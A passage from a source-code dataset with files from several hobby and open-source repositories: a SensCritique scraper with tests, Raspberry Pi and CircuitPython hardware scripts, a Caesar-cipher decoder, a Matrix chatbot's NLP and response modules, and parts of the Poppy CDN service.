"Number of Ratings",
"URL",
"Original Title",
"Year",
"Release Date",
"Picture URL",
"Genre",
"Description",
]
```
#### File: senscritiquescraper/utils/search_utils.py
```python
import logging
from bs4 import BeautifulSoup
from typing import Optional
import urllib.parse
logger = logging.getLogger(__name__)
GENRE_CHOICES = ["Morceaux", "Albums", "Films", "Livres", "Séries", "BD", "Jeux"]
def sanitize_text(text: str) -> str:
"""Sanitize text to URL-compatible text."""
return urllib.parse.quote_plus(text)
def get_search_url(search_term: str, genre: str = None) -> str:
"""Returns the senscritique search URL for a search term."""
search_term_sanitized = sanitize_text(search_term)
if genre not in GENRE_CHOICES:
url = f"https://www.senscritique.com/search?q={search_term_sanitized}"
else:
url = f"https://www.senscritique.com/search?q={search_term_sanitized}&categories[0][0]={genre}"
return url
def get_search_result(soup: BeautifulSoup, position: int) -> Optional[str]:
"""Returns the URL result of the BeautifulSoup object at the defined position."""
try:
url_list = [
x.find_all("a")[1]["href"]
for x in soup.find_all(
"div", {"class": "ProductListItem__Container-sc-1ci68b-0"}
)
]
if position > len(url_list):
logger.error(
f"Desired result not found in search results (Desired result: position {position}, number of search results: {len(url_list)})."
)
return None
return url_list[position - 1]
except Exception as e:
logger.error(e)
return None
```
#### File: tests/tests_survey/test_survey_comic.py
```python
from senscritiquescraper.utils import survey_utils
def test_get_category_from_survey(survey_comic):
assert survey_utils.get_category_from_survey(survey_comic) == "bd"
def test_get_rows_from_survey(survey_comic):
rows = survey_utils.get_rows_from_survey(survey_comic)
assert len(rows) == 10
def test_get_infos_from_survey(survey_comic):
category = survey_utils.get_category_from_survey(survey_comic)
infos = survey_utils.get_survey_infos(survey_comic, category)
assert len(infos) == 10
assert infos[0]["Title"] == "Astérix et Cléopâtre - Astérix, tome 6"
```
#### File: tests/tests_top/test_topchart_movie.py
```python
from senscritiquescraper.utils.row_utils import row_utils
def test_movie_rank(topchart_row_movie):
rank = row_utils.get_rank(topchart_row_movie)
assert rank == "1"
def test_movie_title(topchart_row_movie):
title = row_utils.get_title(topchart_row_movie)
assert title == "Fight Club"
def test_movie_url(topchart_row_movie):
url = row_utils.get_url(topchart_row_movie)
assert url.startswith("https")
def test_movie_original_title(topchart_row_movie):
original_title = row_utils.get_original_title(topchart_row_movie)
assert not original_title
def test_movie_year(topchart_row_movie):
year = row_utils.get_year(topchart_row_movie)
assert year == "1999"
def test_movie_release_date(topchart_row_movie):
release_date = row_utils.get_baseline_1(topchart_row_movie)
assert release_date == "10 novembre 1999 (France)"
def test_movie_length(topchart_row_movie):
length = row_utils.get_baseline_0(topchart_row_movie)
assert length == "2 h 19 min"
def test_movie_cover(topchart_row_movie):
cover_url = row_utils.get_picture_url(topchart_row_movie)
assert cover_url.startswith("https")
def test_movie_genre(topchart_row_movie):
genre = row_utils.get_genre(topchart_row_movie)
assert genre == "Drame"
def test_movie_author(topchart_row_movie):
author = row_utils.get_producer(topchart_row_movie)
assert author == "<NAME>"
def test_movie_description(topchart_row_movie):
description = row_utils.get_description(topchart_row_movie)
# description Fight Club
assert description.startswith("Insomniaque")
def test_movie_average_rating(topchart_row_movie):
average_rating = row_utils.get_average_rating(topchart_row_movie)
assert len(average_rating) == 3
def test_movie_number_ratings(topchart_row_movie):
number_ratings = row_utils.get_number_of_ratings(topchart_row_movie)
assert int(number_ratings) > 160000
```
#### File: tests/tests_work/test_work_jeu.py
```python
def test_get_work_jeu(work_object_jeu):
details = work_object_jeu.get_details()
assert isinstance(details, dict)
assert len(details) == 17
def test_rating_work_jeu(work_object_jeu):
main_rating = work_object_jeu.get_main_rating()
assert isinstance(main_rating, str)
assert main_rating == "6.5"
def test_rating_details_work_jeu(work_object_jeu):
rating_details = work_object_jeu.get_rating_details()
assert isinstance(rating_details, dict)
assert len(rating_details) == 10
def test_title_work_jeu(work_object_jeu):
title = work_object_jeu.get_title()
assert title == "Verdun"
def test_year_work_jeu(work_object_jeu):
year = work_object_jeu.get_year()
assert year == "2013"
def test_cover_url_work_jeu(work_object_jeu):
cover_url = work_object_jeu.get_cover_url()
assert isinstance(cover_url, str)
assert (
cover_url == "https://media.senscritique.com/media/000019964116/160/Verdun.jpg"
)
def test_complementary_infos_work_jeu(work_object_jeu):
complementary_infos = work_object_jeu.get_complementary_infos()
assert isinstance(complementary_infos, dict)
def test_review_count_work_jeu(work_object_jeu):
review_count = work_object_jeu.get_review_count()
assert isinstance(review_count, str)
def test_vote_count_work_jeu(work_object_jeu):
vote_count = work_object_jeu.get_vote_count()
assert isinstance(vote_count, str)
def test_favorite_count_work_jeu(work_object_jeu):
favorite_count = work_object_jeu.get_favorite_count()
assert isinstance(favorite_count, str)
def test_wishlist_count_work_jeu(work_object_jeu):
wishlist_count = work_object_jeu.get_wishlist_count()
assert isinstance(wishlist_count, str)
def test_in_progress_count_work_jeu(work_object_jeu):
in_progress_count = work_object_jeu.get_in_progress_count()
assert isinstance(in_progress_count, str)
``` |
{
"source": "jquintus/PiProject",
"score": 2
} |
#### File: Feather/funWithRotaryEncoders/code.py
```python
import adafruit_ble
from adafruit_ble.advertising import Advertisement
from adafruit_ble.advertising.standard import ProvideServicesAdvertisement
from adafruit_ble.services.standard.hid import HIDService
from adafruit_ble.services.standard.device_info import DeviceInfoService
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS
import rotaryio
import board
import digitalio
"""
HARDWARE
Board: Metro Express
Rotary encoder
clk -> D11
dt -> D10
sw -> D9
+ -> 5v
grnd -> grnd
STEMMA Wired Tactile Push-Button Pack
Red Button -> GRND & D8
Black Button -> GRND & D7
"""
print("finished imports")
VOLUME_UP = 0x80
VOLUME_DOWN = 0x81
hid = HIDService()
device_info = DeviceInfoService(software_revision=adafruit_ble.__version__,
manufacturer="Adafruit Industries")
advertisement = ProvideServicesAdvertisement(hid)
advertisement.appearance = 961
scan_response = Advertisement()
scan_response.complete_name = "TEST CircuitPython HID"
ble = adafruit_ble.BLERadio()
if not ble.connected:
print("advertising")
ble.start_advertising(advertisement, scan_response)
else:
print("already connected")
print(ble.connections)
k = Keyboard(hid.devices)
kl = KeyboardLayoutUS(k)
encoder = rotaryio.IncrementalEncoder(board.A1, board.A2)
last_position = encoder.position
def volume_up(delta):
for _ in range(delta):
print("Going up")
k.send(VOLUME_UP)
def volume_down(delta):
for _ in range(-1 * delta):
print("going down")
k.send(VOLUME_DOWN)
print("Finished setup")
while True:
current_position = encoder.position
position_change = current_position - last_position
if position_change > 0:
volume_up(position_change)
print(current_position)
elif position_change < 0:
volume_down(position_change)
print(current_position)
last_position = current_position
```
#### File: piboard/client/Encoder.py
```python
import RPi.GPIO as GPIO
class Encoder:
def __init__(self, a_pin, a_cmd, b_pin, b_cmd, noop):
self.a_pin = a_pin
self.a_cmd = a_cmd
self.b_pin = b_pin
self.b_cmd = b_cmd
self.noop = noop
self.old_a = True
self.old_b = True
def setup(self):
GPIO.setup(self.a_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.b_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
def get_encoder_turn(self):
# return -1, 0, or +1
result = 0
self.new_a = GPIO.input(self.a_pin)
self.new_b = GPIO.input(self.b_pin)
if self.new_a != self.old_a or self.new_b != self.old_b:
if self.old_a == 0 and self.new_a == 1:
result = (self.old_b * 2 - 1)
elif self.old_b == 0 and self.new_b == 1:
result = -(self.old_a * 2 - 1)
self.old_a, self.old_b = self.new_a, self.new_b
return result
def get_command(self):
change = self.get_encoder_turn()
if change > 0:
return self.a_cmd
elif change < 0:
return self.b_cmd
else:
return self.noop
```
#### File: piboard/client/RgbLed.py
```python
import board
import busio
import digitalio
import adafruit_tlc59711
def create_spi():
spi = busio.SPI(clock=board.SCK, MOSI=board.MOSI)
return spi
class RgbLed:
def __init__(self, spi):
self.spi = spi
self.MAX = 65535
self.MAX_BRIGHT = 127
def setup(self):
self.led = adafruit_tlc59711.TLC59711(self.spi)
def get_command(self):
pass
def red(self, idx):
self.led[idx] = (self.MAX, 0, 0)
def green(self, idx):
self.led[idx] = (0, self.MAX, 0)
def blue(self, idx):
self.led[idx] = (0, 0, self.MAX)
def purple(self, idx):
red = int(self.MAX / 4)
self.led[idx] = (red, 0, self.MAX)
def dim(self):
self.led.red_brightness = 6
self.led.green_brightness = 6
self.led.bluebrightness = 6
```
#### File: PiProject/spikes/sos.py
```python
from gpiozero import LED
from time import sleep
led = LED(24)
timeUnit = 0.1
dotTime = 1 * timeUnit
dashTime = 3 * timeUnit
betweenSymbols = 1 * timeUnit
betweenLetters = 3 * timeUnit
betweenWords = 7 * timeUnit
def dot():
led.on()
sleep(dotTime)
led.off()
def dash():
led.on()
sleep(dashTime)
led.off()
def morse_s():
dot()
sleep(betweenSymbols)
dot()
sleep(betweenSymbols)
dot()
def morse_o():
dash()
sleep(betweenSymbols)
dash()
sleep(betweenSymbols)
dash()
while True:
morse_s()
sleep(betweenLetters)
morse_o()
sleep(betweenLetters)
morse_s()
sleep(betweenWords)
``` |
{
"source": "jquk/cryptography",
"score": 4
} |
#### File: cipher/Caesar-py/cipher-shift-decode.py
```python
import sys
class ClassName(object):
"""docstring for """
def __init__(self, arg):
self.arg = arg
class Cipher_Shift(object):
"""
DEFAULT SHIFT IS 2,
UNLESS ANOTHER SHIFT IS PASSED AS ARGUMENT TO THE SCRIPT
FOR THIS CLASS' CONSTRUCTOR TO TAKE IT IN.
"""
def __init__(self, arg=2):
self.SHIFT_KEY = arg
# INPUT TEXT
#===========
def _get_file_content(self):
fh = open('io/ciphered.txt', 'r')
fc = fh.read()
fh.close()
fc = "".join(fc.split())
print(fc)
return fc
def _save_to_file(self, ciphered):
fh = open("io/de-ciphered.txt", "w")
lines_of_text = ciphered
fh.writelines(lines_of_text)
fh.close()
# GET SHIFT
#==========
def _get_shifted_value(self, letter):
ascii_val_shifted = 0
if self.SHIFT_KEY > 0:
""" check that the result of the operation would be
within the ascii lower case letters range """
# print "ord('a') " + str(ord('a'))
# print "ord('" + str(letter) + "') " + str(ord(letter)) + " - " + str(self.SHIFT_KEY) + " = " + str(ord(letter) - self.SHIFT_KEY) + " = " + str(chr( ord(letter) - self.SHIFT_KEY ))
# print "ord('z') " + str(ord('z')) + "\n"
if ((ord(letter) - self.SHIFT_KEY) > ord('a')):
ascii_val_shifted = ord(letter) - self.SHIFT_KEY
elif ((ord(letter) - self.SHIFT_KEY) == ord('a')):
ascii_val_shifted = ord(letter) - self.SHIFT_KEY
elif ((ord(letter) - self.SHIFT_KEY) < ord('a')):
dist_sk = ord('a') - (ord(letter) - self.SHIFT_KEY)
ascii_val_shifted = ord('z') - dist_sk
# print "\n\tdist_sk " + str(dist_sk) + "\n\tascii_val_shifted " + str(ascii_val_shifted) + "\n\tascii " + chr(ascii_val_shifted)
elif self.SHIFT_KEY == 0:
ascii_val_shifted = ord(letter)
elif self.SHIFT_KEY < 0:
if ((ord(letter) + self.SHIFT_KEY) < ord('a')):
dist_sk = ord('a') - (ord(letter) - self.SHIFT_KEY) - 1
ascii_val_shifted = ord('z') - dist_sk
elif ((ord(letter) + self.SHIFT_KEY) == ord('a')):
ascii_val_shifted = ord('a')
elif ((ord(letter) + self.SHIFT_KEY) > ord('a')):
ascii_val_shifted = ord(letter) - self.SHIFT_KEY
return ascii_val_shifted
# GET ASCII FOR EVERY LETTER AND SHIFT
#=====================================
def _get_ascii_and_shift(self, fc):
fc_ascii = ''
fc_ascii_shifted = ''
fc_ascii_shifted_converted = ''
for letter in fc:
ascii_val = ord(letter)
fc_ascii = str(fc_ascii) + str(ord(letter))
# print(fc_ascii)
""" SHIFT """
ascii_val_shifted = self._get_shifted_value(letter)
fc_ascii_shifted = str(fc_ascii) + str(ascii_val_shifted)
# print(fc_ascii_shifted)
char_val_shifted = chr(ascii_val_shifted)
fc_ascii_shifted_converted = fc_ascii_shifted_converted + char_val_shifted
# print(fc_ascii_shifted_converted)
print(fc_ascii_shifted_converted)
return fc_ascii_shifted_converted
if len(sys.argv) > 1:
SHIFT_KEY = int(sys.argv[1])
cipher_shift = Cipher_Shift(SHIFT_KEY)
else:
cipher_shift = Cipher_Shift()
fc = cipher_shift._get_file_content()
ciphered = cipher_shift._get_ascii_and_shift(fc)
cipher_shift._save_to_file(ciphered)
``` |
{
"source": "jquku/Matrix-Chatbot",
"score": 3
} |
#### File: jquku/Matrix-Chatbot/config.py
```python
import os
import yaml
import sys
from typing import List, Any
class Config(object):
def __init__(self, filepath):
# Load in the config file at the given filepath
with open(filepath) as file_stream:
self.config = yaml.safe_load(file_stream.read())
#account setup
self.user_id = self.get_config(["matrix", "user_id"], required=True)
self.user_password = self.get_config(["matrix", "user_password"], required=True)
self.homeserver_url = self.get_config(["matrix", "homeserver_url"], required=True)
#database setup
self.name = self.get_config(["database", "name"], required=True)
self.user = self.get_config(["database", "user"], required=True)
self.password = self.get_config(["database", "password"], required=True)
self.host = self.get_config(["database", "host"], required=True)
self.port = self.get_config(["database", "port"], required=True)
def get_config(
self,
path: List[str],
default: Any = None,
required: bool = True,
) -> Any:
#get fitting option
config = self.config
for name in path:
config = config.get(name)
return config
```
#### File: Matrix-Chatbot/models/database.py
```python
import psycopg2
import sys
sys.path.append("./../")
from services.database_service import connect_to_database
'''creating all the database tables based on sql commands'''
def create_tables():
'''creates all the database tables'''
connection = connect_to_database() #initialize db connection
#create tables via sql commands
cursor = connection.cursor()
cursor.execute("CREATE TABLE IF NOT EXISTS domain_description (id SERIAL PRIMARY KEY, name VARCHAR(255), original VARCHAR(255), source VARCHAR(255), satisfaction integer, feedback_given integer)")
cursor.execute("CREATE TABLE IF NOT EXISTS user_client (id SERIAL PRIMARY KEY, name text, last_module integer, links_preferred integer, stats_preferred integer, links_counter integer, language VARCHAR(255), FOREIGN KEY (last_module) REFERENCES domain_description(id))")
cursor.execute("CREATE TABLE IF NOT EXISTS statistics (id SERIAL PRIMARY KEY, domain_description_id integer, topic VARCHAR(255), questioned integer, FOREIGN KEY (domain_description_id) REFERENCES domain_description(id) )")
cursor.execute("CREATE TABLE IF NOT EXISTS message (id SERIAL PRIMARY KEY, user_client_id integer, body text, information_extracted text, all_links text, response text, FOREIGN KEY (user_client_id) REFERENCES user_client(id))")
cursor.execute("CREATE TABLE IF NOT EXISTS data_basis (id SERIAL PRIMARY KEY, domain_description_id integer, original text, topic VARCHAR(255), response VARCHAR(255), FOREIGN KEY (domain_description_id) REFERENCES domain_description(id))")
cursor.execute("CREATE TABLE IF NOT EXISTS salt (id SERIAL PRIMARY KEY, value text)")
cursor.execute("CREATE TABLE IF NOT EXISTS room (id SERIAL PRIMARY KEY, room_id text, user_client_id integer, FOREIGN KEY (user_client_id) REFERENCES user_client(id) )")
connection.commit() #commit changes
cursor.close()
connection.close()
#python interpreter calls create_tables function
if __name__ == '__main__':
create_tables()
```
#### File: Matrix-Chatbot/modules/nlp.py
```python
import sys
import nltk
import re
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import RegexpTokenizer
from nltk.corpus import stopwords
from nltk.corpus import brown
from autocorrect import Speller
sys.path.append("./../")
from services.database_service import (data_basis_query, get_number_of_links_to_be_shown,
set_number_of_links_to_be_shown, get_concerning_links, get_next_links)
'''
Natural Language Processing Strategy
1. Conversion to lowercase letters
2. Remove special characters
3. Tokenization
4. Remove spelling errors
5. Lemmatization
6. Remove stop words
'''
def language_processing(message):
'''method is called first'''
lowercased = lowercase(message)
remove_noises = noise_removal(lowercased)
tokens = tokenization(remove_noises)
after_spell_checking = remove_spelling_errors(tokens)
after_lemmatization = lemmatization(after_spell_checking)
final_message = remove_stop_words(after_lemmatization)
return lowercased, final_message, tokens, after_lemmatization #returns tuple
def lowercase(text):
'''lowercasing every letter in string'''
message = text.lower()
return message
def noise_removal(text):
'''remove special char, every character besieds letters and numbers'''
text = re.sub(r'([^a-zA-Z0-9\s]+?)', '', text)
return text
def tokenization(message):
'''tokenize message, also whitespaces deleted'''
tokens = nltk.word_tokenize(message)
return tokens
def lemmatization(tokens):
'''lemmatization of tokens'''
lemmatizer = WordNetLemmatizer()
lemmatization_list = []
for token in tokens:
lemmatized = lemmatizer.lemmatize(token)
lemmatization_list.append(lemmatized)
return lemmatization_list
def remove_stop_words(list):
'''removal of german and english stop words'''
stop_words_english = set(stopwords.words('english'))
stop_words_german = set(stopwords.words('german'))
filtered_list = [w for w in list if not w in stop_words_english]
filtered_list = [w for w in filtered_list if not w in stop_words_german]
return filtered_list
def remove_spelling_errors(list):
'''remove spelling errors via speller module'''
spell = Speller()
new_list = []
for word in list:
word_new = spell(word)
new_list.append(word_new)
return new_list
```
#### File: Matrix-Chatbot/modules/response_management.py
```python
import sys
import random
sys.path.append("./../")
from services.database_service import (get_number_of_links_to_be_shown,
set_number_of_links_to_be_shown, get_concerning_links, get_next_links,
get_stats, increment_links_counter_for_helpful,
get_links_counter_for_helpful, update_modul_satisfaction,
get_last_module_of_user, create_new_message, update_last_module_of_user,
get_domain_name, get_last_message, get_organisation_text,
get_stats_preferred, get_user_language)
'''
this module receives the message evaluation and builds an
appropiate chatbot response
'''
def generate_response(user, message, original_message):
'''method that generates the final chatbot response based on evaluation'''
lowercase_only = message[0]
standardized_message = message[1]
help = message[2]
number_of_links = message[3]
show_more = message[4]
show_all = message[5]
stats_called = message[6]
message_contains_yes_or_no = message[7]
message_contains_thank_you = message[8]
changed_number_of_stats = message[9]
change_language = message[10]
links_from_multiple_modules = message[11]
links = message[12]
small_talk = message[13]
organisational = message[14]
response = ""
number_of_links_found = len(links)
language_of_user = get_user_language(user)[0]
#step 1: check if help called
if help == True:
if language_of_user == "english":
response = "Use 'links = X' to return X links by default. \n" + "Use 'show more' to display more links fitting the query. \n" + "Use 'show all' to display all links fitting the query. \n" + "Use 'stats' and add your module to receive the statistics. \n" + "Use 'stats = X' to return X stats by default. \n" + "Use 'language = english/german' to change my bot language."
else:
response = "Schreibe 'links = X' um standardmäßig X links zurückzugeben. \n" + "Mit 'zeig mehr' bekommst du mehr Links angezeigt. \n" + "Mit 'zeig alles' werden alle passenden Links zurückgegeben. \n" + "Tippe 'stats' und füge deinen Modulnamen hinzu, um die Statistiken abzurufen. \n" + "Mit 'stats = X' werden dir X Statistiken angezeigt.. \n" + "Mit 'language = englisch/deutsch' kannst du die Bot Sprache abändern."
create_new_message(user, original_message, lowercase_only, "", response)
return response
#step 2: check if number of links called, if number of stats changed or user language changed
if number_of_links == True or changed_number_of_stats == True or change_language == True:
#new number of links already set in message_evaluation module
if language_of_user == "english":
response = "I saved the changes."
else:
response = "Ich habe die Änderungen abgespeichert."
create_new_message(user, original_message, lowercase_only, "", response)
return response
#step 3: small talk and organisational domains
if len(small_talk) > 0:
response = response + small_talk[0] + " "
if len(organisational) > 0:
response = response + organisational[0] + "\n"
#step 4: add you're welcome if user thanked chatbot
if message_contains_thank_you == True:
if language_of_user == "english":
response = response + "You're welcome. "
else:
response = response + "Bitte. "
#step 5: return statistics if called
if stats_called != False:
output_stats = get_stats(stats_called) #returns sorted list of topics + question couter
if language_of_user == "english":
response = response + "Here are the most requested topics. \n \n"
else:
response = response + "Hier sind die am häufigsten angefragten Themen. \n \n"
number_of_stats_to_return = get_stats_preferred(user)[0]
if number_of_stats_to_return > len(output_stats):
number_of_stats_to_return = len(output_stats)
for j in range(0, number_of_stats_to_return):
if language_of_user == "english":
response = response + str(output_stats[j][0]) + " was requested " + str(output_stats[j][1]) + " times. \n"
else:
response = response + str(output_stats[j][0]) + " wurde " + str(output_stats[j][1]) + "-mal angefragt. \n"
create_new_message(user, original_message, lowercase_only, "", response)
return response
#step 6: check if show more or show all called
if show_more == True:
links_last_message_more = get_next_links(user)
response = response + links_last_message_more
if show_all == True:
links_last_message_all = get_concerning_links(user)
response = response + links_last_message_all[0]
#step 7: add fitting links (response from domain) if necessary
if number_of_links_found > 0:
if links_from_multiple_modules != False:
if language_of_user == "english":
response = response + "I've found fitting results from the following modules: \n" + links_from_multiple_modules + "Which module are you interested in?"
else:
response = response + "Ich habe zu den folgenden Modulen passende Resultate erhalten: \n" + links_from_multiple_modules + "Welches Modul interessiert dich??"
all_links_db = list_to_string(links)
create_new_message(user, original_message, lowercase_only, all_links_db, response)
return response
how_many_links_to_show = get_number_of_links_to_be_shown(user)
increment_links_counter_for_helpful(user)
how_many_links_to_show = int(how_many_links_to_show)
if language_of_user == "english":
response = response + "I've found " + str(number_of_links_found) + " results. "
else:
response = response + "Ich habe " + str(number_of_links_found) + " Resultate gefunden. "
for i in range(0, number_of_links_found):
if i == 0:
#get domain name of best fitting response
module = get_domain_name(links[i])[0]
update_last_module_of_user(user, module)
if i < how_many_links_to_show:
response = response + links[i] + "\n" + "\n"
else:
break
#step 8: add "is my answer helpful" after every 5th link interaction
counter = get_links_counter_for_helpful(user)
if counter[0] % 5 == 0:
if language_of_user == "english":
response = response + "Is my answer helpful?"
else:
response = response + "War meine Antwort hilfreich?"
#step 9: check if user answered with "yes" or "no" after "if answer was helpful"
else:
if message_contains_yes_or_no != False:
counter = get_links_counter_for_helpful(user)
if counter[0] % 5 == 0:
last_message = get_last_message(user)[0]
helpful_string_english = "Is my answer helpful?"
helpful_string_german = "War meine Antwort hilfreich?"
if helpful_string_english in last_message or helpful_string_german in last_message:
if language_of_user == "english":
response = response + "Thanks for your feedback!"
else:
response = response + "Danke für dein Feedback!"
last_module = get_last_module_of_user(user)[0]
update_modul_satisfaction(last_module, message_contains_yes_or_no)
create_new_message(user, original_message, lowercase_only, "", response)
return response
#step 10: check if default answer is necessary
if response == "":
if message_contains_yes_or_no != False:
return response
#random chosing of default message
if language_of_user == "english":
default_1 = "Can you please specify your question?"
default_2 = "I haven't found anything fitting."
default_3 = "I've found no match to your question."
default_4 = "I can't answer that."
else:
default_1 = "Kannst du deine Frage bitte spezifizieren?"
default_2 = "Ich kenne keine passende Antwort."
default_3 = "Ich habe keine Übereinstimmung gefunden."
default_4 = "Das kann ich nicht beantworten."
default_answer = [default_1, default_2, default_3, default_4]
response = random.choice(default_answer)
all_links_db = list_to_string(links)
if all_links_db == "":
if show_more == True:
all_links_db = get_concerning_links(user) #wrong
if show_all == True:
all_links_db = links_last_message_all[0]
create_new_message(user, original_message, lowercase_only, all_links_db, response)
return response
def list_to_string(links):
'''method that transforms a list into a string'''
final = ""
for i in range(0, len(links)):
final = final + links[i] + "\n" + "\n"
return final
``` |
{
"source": "jqwez/rock_paper_scissors_gui",
"score": 4
} |
#### File: jqwez/rock_paper_scissors_gui/rockpaper_objectoriented.py
```python
import random
class Game:
def __init__(self):
run_game()
class HumanPlayer(record):
def __init__(self, x, y, name):
self.x = all_time_record
self.y = current_record
self.name = player_name
def throw_rock(self):
player_throw = "rock"
def throw_paper(self):
player_throw = "paper"
def throw_scissors(self):
player_throw = "scissors"
class ComputerPlayer:
def __init__(self, x, y):
self.x = all_time_record
self.y = current_record
def throw(self):
throw = random.choice(["rock", "paper", "scissors"])
``` |
{
"source": "jqxin2006/poppy",
"score": 2
} |
#### File: poppy/poppy/bootstrap.py
```python
from oslo.config import cfg
from stevedore import driver
from stevedore import named
from poppy.common import decorators
from poppy.openstack.common import log
LOG = log.getLogger(__name__)
_DEFAULT_OPTIONS = [
cfg.StrOpt('datacenter', default='',
help='Host datacenter of the API'),
cfg.BoolOpt('project_id_in_url', default=False,
help='Indicating if the project id'
' should be presented in the url')
]
_DRIVER_OPTIONS = [
cfg.StrOpt('transport', default='pecan',
help='Transport driver to use'),
cfg.StrOpt('manager', default='default',
help='Manager driver to use'),
cfg.StrOpt('storage', default='mockdb',
help='Storage driver to use'),
cfg.ListOpt('providers', default=['mock'],
help='Provider driver(s) to use'),
cfg.StrOpt('dns', default='default',
help='DNS driver to use'),
]
_DRIVER_GROUP = 'drivers'
class Bootstrap(object):
"""Defines the CDN bootstrapper.
The bootstrap loads up drivers per a given configuration, and
manages their lifetimes.
"""
def __init__(self, conf):
self.conf = conf
self.conf.register_opts(_DEFAULT_OPTIONS)
self.conf.register_opts(_DRIVER_OPTIONS, group=_DRIVER_GROUP)
self.driver_conf = self.conf[_DRIVER_GROUP]
log.setup('poppy')
LOG.debug("init bootstrap")
@decorators.lazy_property(write=False)
def dns(self):
"""DNS."""
LOG.debug((u'Loading DNS driver'))
# create the driver manager to load the appropriate drivers
dns_type = 'poppy.dns'
dns_name = self.driver_conf.dns
args = [self.conf]
try:
mgr = driver.DriverManager(namespace=dns_type,
name=dns_name,
invoke_on_load=True,
invoke_args=args)
return mgr.driver
except RuntimeError as exc:
LOG.exception(exc)
@decorators.lazy_property(write=False)
def provider(self):
"""provider.
:returns mgr
"""
LOG.debug((u'Loading provider extension(s)'))
# create the driver manager to load the appropriate drivers
provider_type = 'poppy.provider'
args = [self.conf]
provider_names = self.driver_conf.providers
mgr = named.NamedExtensionManager(namespace=provider_type,
names=provider_names,
invoke_on_load=True,
invoke_args=args)
return mgr
@decorators.lazy_property(write=False)
def storage(self):
"""storage.
:returns mgr driver
"""
LOG.debug((u'Loading storage driver'))
# create the driver manager to load the appropriate drivers
storage_type = 'poppy.storage'
storage_name = self.driver_conf.storage
args = [self.conf]
try:
mgr = driver.DriverManager(namespace=storage_type,
name=storage_name,
invoke_on_load=True,
invoke_args=args)
return mgr.driver
except RuntimeError as exc:
LOG.exception(exc)
@decorators.lazy_property(write=False)
def manager(self):
"""manager.
:returns mgr driver
"""
LOG.debug((u'Loading manager driver'))
# create the driver manager to load the appropriate drivers
manager_type = 'poppy.manager'
manager_name = self.driver_conf.manager
args = [self.conf, self.storage, self.provider, self.dns]
try:
mgr = driver.DriverManager(namespace=manager_type,
name=manager_name,
invoke_on_load=True,
invoke_args=args)
return mgr.driver
except RuntimeError as exc:
LOG.exception(exc)
@decorators.lazy_property(write=False)
def transport(self):
"""transport.
:returns mgr driver
"""
LOG.debug("loading transport")
# create the driver manager to load the appropriate drivers
transport_type = 'poppy.transport'
transport_name = self.driver_conf.transport
args = [self.conf, self.manager]
LOG.debug((u'Loading transport driver: %s'), transport_name)
try:
mgr = driver.DriverManager(namespace=transport_type,
name=transport_name,
invoke_on_load=True,
invoke_args=args)
return mgr.driver
except RuntimeError as exc:
LOG.exception(exc)
def run(self):
self.transport.listen()
```
#### File: poppy/common/util.py
```python
import pprint
class dict2obj(object):
"""Creates objects that behave much like a dictionaries."""
def __init__(self, d):
for k in d:
if isinstance(d[k], dict):
self.__dict__[k] = dict2obj(d[k])
elif isinstance(d[k], (list, tuple)):
l = []
for v in d[k]:
if isinstance(v, dict):
l.append(dict2obj(v))
else:
l.append(v)
self.__dict__[k] = l
else:
self.__dict__[k] = d[k]
def __getitem__(self, name):
if name in self.__dict__:
return self.__dict__[name]
def __iter__(self):
return iter(self.__dict__.keys())
def __repr__(self):
return pprint.pformat(self.__dict__)
```
#### File: default/service_async_workers/create_service_worker.py
```python
import argparse
import json
import logging
import os
from oslo.config import cfg
from poppy import bootstrap
from poppy.model.helpers import provider_details
from poppy.openstack.common import log
from poppy.transport.pecan.models.request import service
LOG = log.getLogger(__file__)
conf = cfg.CONF
conf(project='poppy', prog='poppy', args=[])
def service_create_worker(providers_list_json,
project_id, service_id, service_obj_json):
LOG.logger.setLevel(logging.INFO)
bootstrap_obj = bootstrap.Bootstrap(conf)
service_controller = bootstrap_obj.manager.services_controller
providers_list = json.loads(providers_list_json)
service_obj = service.load_from_json(json.loads(service_obj_json))
responders = []
# try to create all service from each provider
for provider in providers_list:
LOG.info('Starting to create service from %s' % provider)
responder = service_controller.provider_wrapper.create(
service_controller._driver.providers[provider],
service_obj)
responders.append(responder)
LOG.info('Create service from %s complete...' % provider)
# create dns mapping
dns = service_controller.dns_controller
dns_responder = dns.create(responders)
provider_details_dict = {}
for responder in responders:
for provider_name in responder:
if 'error' in responder[provider_name]:
error_msg = responder[provider_name]['error']
error_info = responder[provider_name]['error_detail']
provider_details_dict[provider_name] = (
provider_details.ProviderDetail(
error_info=error_info,
status='failed',
error_message=error_msg))
elif 'error' in dns_responder[provider_name]:
error_msg = dns_responder[provider_name]['error']
error_info = dns_responder[provider_name]['error_detail']
provider_details_dict[provider_name] = (
provider_details.ProviderDetail(
error_info=error_info,
status='failed',
error_message=error_msg))
else:
access_urls = dns_responder[provider_name]['access_urls']
provider_details_dict[provider_name] = (
provider_details.ProviderDetail(
provider_service_id=responder[provider_name]['id'],
access_urls=access_urls))
if 'status' in responder[provider_name]:
provider_details_dict[provider_name].status = (
responder[provider_name]['status'])
else:
provider_details_dict[provider_name].status = 'deployed'
service_controller.storage_controller.update_provider_details(
project_id,
service_id,
provider_details_dict)
service_controller.storage_controller._driver.close_connection()
LOG.info('Create service worker process %s complete...' %
str(os.getpid()))
if __name__ == '__main__':
bootstrap_obj = bootstrap.Bootstrap(conf)
parser = argparse.ArgumentParser(description='Create service async worker'
' script arg parser')
parser.add_argument('providers_list_json', action="store")
parser.add_argument('project_id', action="store")
parser.add_argument('service_id', action="store")
parser.add_argument('service_obj_json', action="store")
result = parser.parse_args()
providers_list_json = result.providers_list_json
project_id = result.project_id
service_id = result.service_id
service_obj_json = result.service_obj_json
LOG.logger.setLevel(logging.INFO)
service_create_worker(providers_list_json, project_id,
service_id, service_obj_json)
```
#### File: default/service_async_workers/sub_process_proxy.py
```python
import os
import subprocess
import sys
try:
import uwsgi
use_uwsgi = True
except ImportError:
use_uwsgi = False
from poppy.openstack.common import log
LOG = log.getLogger(__name__)
if use_uwsgi:
executable = os.path.join(uwsgi.opt['virtualenv'], 'bin', 'python')
else:
executable = sys.executable
def main(*args):
cmd_list = [executable] + list(args[1:])
LOG.info("Starting subprocess %s")
subprocess.Popen(cmd_list, stdout=sys.stdout, env=os.environ.copy())
sys.exit()
if __name__ == '__main__':
main(*sys.argv)
```
#### File: manager/default/services.py
```python
